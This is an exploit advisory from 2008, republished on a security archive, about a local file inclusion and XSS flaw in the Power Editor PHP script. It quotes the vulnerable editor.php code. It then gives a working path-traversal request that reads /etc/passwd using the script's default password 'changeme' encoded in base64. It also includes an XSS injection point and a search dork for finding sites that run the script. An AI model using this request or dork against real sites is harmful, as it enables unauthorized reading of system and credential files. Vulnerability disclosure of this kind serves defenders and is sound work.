Bug: Power Editor LOCAL FILE INCLUSION Vulnerbility ( Ascii Version )

Search:
WLB2

Power Editor LOCAL FILE INCLUSION Vulnerbility

Published
Credit
Risk
2008.05.10
Virangar Security Team
Medium
CWE
CVE
Local
Remote
N/A
CVE-2008-2115
CVE-2008-2116
Yes
No


########################################################################

# #

# ..:::::Power Editor LOCAL FILE INCLUSION Vulnerbility ::::... #

########################################################################

Virangar Security Team

www.virangar.net

--------

Discoverd By :Virangar Security Team (hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all iranian hackerz

greetz:to my best friend in the world hadi_aryaie2004

& my lovely friend arash(imm02tal) from emperor team :)

-----------------------------------

download:http://www.scriptsez.net/index.php?action=details&cat=Content%2
0Management&id=1063623812

dork: Powered By Power Editor

-----------------------------------

vuln code in editor.php:

line 84-94:

if ($action=="tempedit") {

$n=base64_decode($m);

if ($n==$password){

template();

$te=$HTTP_GET_VARS['te'];

$dir=$HTTP_GET_VARS['dir'];

$filename = "$dir/$te";

$fd = fopen ($filename, "r");

$stuff = fread ($fd, filesize ($filename));

fclose ($fd);

?>

-------

vuln:

http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir]

examp:

editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../..
/../../../../../..

-------------------------------------

and xss here :D :

http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[xss]&dir=[xss]

-----

note:

default pass for login is:changeme

-----

young iranian h4ck3rz

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version